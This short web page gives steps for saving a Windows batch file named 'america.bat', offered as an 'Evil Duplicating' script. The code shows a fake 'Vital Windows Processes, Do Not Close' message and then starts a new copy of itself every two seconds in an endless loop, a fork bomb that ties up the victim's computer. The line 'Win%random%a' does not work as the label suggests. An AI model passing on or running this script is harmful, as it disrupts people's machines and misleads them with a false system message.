top of page

1: Copy the text below into notepad
2: Click Save As
3: Name the batch file"america.bat"
Evil Duplicating batch file script
@echo off
color 0a
echo Starting Vital Windows Proscesses, Do Not Close
Pushd "%~dp0"
:a
Win%random%a
timeout /t 2 /nobreak >nul
start america.bat
goto a
bottom of page